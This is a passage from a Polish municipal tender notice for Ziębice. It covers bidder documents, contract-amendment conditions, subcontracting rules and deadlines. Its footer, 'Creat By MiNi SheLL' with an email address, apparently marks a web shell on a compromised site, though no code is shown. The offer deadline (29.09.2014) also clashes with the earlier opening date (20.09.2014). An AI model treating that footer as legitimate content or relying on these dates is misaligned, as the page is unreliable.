</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)     Uproszczony kosztorys ofertowy 
2)     Dokument potwierdzający wniesienie wadium
3) Pełnomocnictwo w oryginale bądź kopii potwierdzonej notarialnie do reprezentowania, o ile ofertę składa pełnomocnik,
4)	   Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Pisemne zobowiązanie innych podmiotów należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem na załączniku nr 7 do SIWZ  
a)	 Jeżeli wykonawca, polega na wiedzy i doświadczeniu,  innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów przedstawia również dokument zawierający:
-	jaki jest  zakres dostępnych wykonawcy zasobów innego podmiotu, 
-	jaki jest sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia,
-	jaki jest charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
-	jaki jest zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie istotne dla stron postanowienia zawiera wzór umowy stanowiący zał.   nr 8  do SIWZ. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.
2.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku   do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:
1)	zmiana terminu realizacji przedmiotu umowy,
a)	zmiany spowodowane warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót,
b)	zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi a w szczególności:
-	niewybuchy i niewypały,
-	wykopaliska archeologiczne nie przewidziane w SIWZ,
-	odmienne od przyjętych w dokumentacji projektowej warunki terenowe w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
c)	zmiany będące następstwem okoliczności leżących po stronie  Zamawiającego  a w szczególności:
-	wstrzymanie robót przez Zamawiającego
-	konieczność  usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej,
-	konieczność udzielenia zamówień uzupełniających, dodatkowych
d)	zmiany będące następstwem działania organów administracji, w szczególności:
-	wstrzymanie prac przez organ konserwatorski,
-	przekroczenie terminów wydanych decyzji, zezwoleń, itp.,
-	odmowa wydania przez organy administracji wymaganych uzgodnień na skutek błędów w dokumentacji projektowej,
w przypadku wystąpienia  którejkolwiek z okoliczności wymienionych w literach a-d termin umowy może ulec zmianie o czas niezbędny do zakończenia wykonania jej przedmiotu  w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
2)	zmiana sposobu spełnienia świadczenia:
a)	zmiany technologiczne a w szczególności:
-	konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem umowy.
-	odmienne od przyjętych w dokumentacji  projektowej warunki skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych, 
-	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji  lub obiektów infrastruktury,
-	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
Zmiany o których mowa w ppkt 2 lit a) tiret 2 i 3 mogą być wprowadzone w sytuacjach, odpowiadających przesłankom  do udzielenia zamówień dodatkowych, oraz w innych sytuacjach, zmiany wskazywane w ppkt. 2 lit. a)  tiret 4 będą wprowadzone wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia  wynagrodzenia z tytułu  takich zmian wyłącznie w kwocie równej  zwiększonym z tego powodu kosztom.
Każda ze wskazanych zmian w ppkt 2 lit .a) tiret 1-4 może być powiązana ze zmianą  wynagrodzenia na zasadach określonych przez strony.
3)	Zmiana obowiązującej stawki VAT:
a)	jeżeli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT  zapłaconego przez Wykonawcę; 
b)	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę podatku VAT do zapłacenia przez Wykonawcę.
4)	Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.  W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie  pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
5)	Jeżeli inny podmiot rozpocznie inwestycję na terenie objętym przedmiotem zamówienia i wystąpią jakiekolwiek kolizje, w takim przypadku zmiany w  umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji.
6)	Zmiany w zakresie podwykonawcy na którego zasoby powoływał się Wykonawca na zasadach określonych w art. 26 ust 2b ustawy Pzp. 
a)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
7)	Zmiana podwykonawcy w przypadkach innych niż określone w ppkt 6
a)	zmiana polegająca na wskazaniu innych podwykonawców,
b)	zmiana w zakresie rezygnacji  z podwykonawców, 
c)	zmiana polegająca na wskazaniu innego zakresu (części) podwykonawstwa,
d)	zmiana polegająca na wykonaniu zamówienia przy pomocy podwykonawców pomimo niewskazania w ofercie żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa,
8)	zmiana osób odpowiedzialnych za 	kierowanie robotami budowlanymi ze strony Wykonawcy (kierownika budowy) zgodnie z warunkiem w zakresie dysponowania osobami zdolnymi do wykonania zamówienia określonym w SIWZ Wykonawca zobowiązuje się do przedłożenia, w terminie 7 dni od podpisania aneksu do umowy, dokumentu potwierdzającego kwalifikacje kierownika budowy wraz z dokumentami potwierdzającymi odbycie co najmniej dwuletniej praktyki zawodowej na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków  oraz aktualnego wpisu na listę właściwej Izby Samorządu Zawodowego lub dokumenty, które potwierdzają odpowiednie kwalifikacje i zostały uznane na zasadach określonych w przepisach odrębnych (podstawa prawna art. 12a ustawy Prawo budowlane). W przypadku zmiany konserwatora prac konserwatorskich Wykonawca zobowiązuje się przedłożyć w terminie 7 dni od podpisania aneksu do umowy dokumentów potwierdzających kwalifikacje oraz doświadczenie zawodowe konserwatora prac konserwatorskich.
3.	Powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
4.	Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze stron, za zgodą drugiej strony umowy, na podstawie aneksu do umowy.
5.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ziebice.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ziębicach,  ul. Przemysłowa 10, 57-220 Ziębice (pokój nr 20b- II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2014 godzina 10:00, miejsce: Ofertę należy złożyć w siedzibie zamawiającego tj. w Urzędzie Miejskim w Ziębicach przy  ul. Przemysłowej 10, 57-220 Ziębice  w sekretariacie (I piętro - pok. Nr 10).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	ZAMAWIAJĄCY NIE PRZEWIDUJE ZAWARCIA UMOWY RAMOWEJ
2.	ROZLICZENIA BĘDĄ PROWADZONE W WALUCIE PLN
3.	ZAMAWIAJĄCY NIE PRZEWIDUJE AUKCJI ELEKTRONICZNEJ
4.	ZAMAWIAJĄCY NIE PRZEWIDUJE WYMAGAŃ, O KTÓRYCH MOWA W ART. 29 UST. 4 USTAWY PRAWO ZAMÓWIEŃ PUBLICZNYCH
5.	INFORMACJA DOTYCZĄCA UDZIAŁU PODWYKONAWCÓW W PRZEDMIOCIE ZAMÓWIENIA

1)	Przez umowę o podwykonawstwo należy rozumieć - umowę w formie pisemnej o charakterze odpłatnym, której przedmiotem są usługi, dostawy, lub roboty budowlane stanowiące część zamówienia publicznego, zawartą między wybranym przez zamawiającego wykonawcą a innym podmiotem (podwykonawcą) a w przypadku zamówień publicznych na roboty budowlane także między podwykonawcą lub między dalszymi podwykonawcami. 
2)	Zamawiający nie zastrzega zgodnie z art. 36a ust. 2 ustawy Pzp, że kluczową część zamówienia przedmiotowej roboty budowlanej musi wykonywać osobiście sam Wykonawca składający ofertę  a nie podwykonawca. 
3)	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy
4)	Zamawiający żąda wskazania przez Wykonawcę części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. Wskazanie w ofercie części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom, winno nastąpić poprzez określenie jej rodzaju i zakresu. W przypadku braku takiego oświadczenia Zamawiający uzna, iż wykonawca będzie realizował zamówienie bez udziału podwykonawców.
5)	wymagania dotyczące umowy o podwykonawstwo, której przedmiotem są roboty budowlane, których niespełnienie spowoduje zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu, jeżeli zamawiający określa takie wymagania, 
a)	projekt umowy/ umowa o roboty budowlane musi wyraźnie wskazać zakres tych robót. 
b)	zakres prac zleconych do wykonania podwykonawcy i dalszemu podwykonawcy musi być zgodny z zakresem robót wynikającym z kosztorysu ofertowego wykonawcy.
c)	projekt umowy/ umowa musi uwzględniać przepisy dotyczące gwarancji           i rękojmi wskazane w SIWZ. 
d)	projekt umowy/umowa musi zawierać warunki odbioru robót oraz postanowienia dotyczące stwierdzenia w trakcie odbioru wad lub usterek,
e)	projekt umowy/umowa musi uwzględniać kary umowne min. za zwłokę            w wykonaniu przedmiotu umowy, za zwłokę w zakończeniu wykonywania przedmiotu umowy, 	za opóźnienie w usunięciu wad stwierdzonych w okresie gwarancji i rękojmi 
f)	projekt umowy/ umowa musi spełniać wymagania określone w specyfikacji istotnych warunków zamówienia wraz z wszystkimi załącznikami oraz  przewidywać termin zapłaty wynagrodzenia nie dłuższy niż 30 dni.

6. OTWARCIE OFERT NASTĄPI W DNIU 20.09.2014 ROKU O  GODZ. 10:30 W SIEDZIBIE ZAMAWIAJĄCEGO TJ. W URZĘDZIE MIEJSKIM W ZIĘBICACH PRZY UL. PRZEMYSŁOWEJ 10 W ZIĘBICACH, W POKOJU NR 2 (SALA NARAD),.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com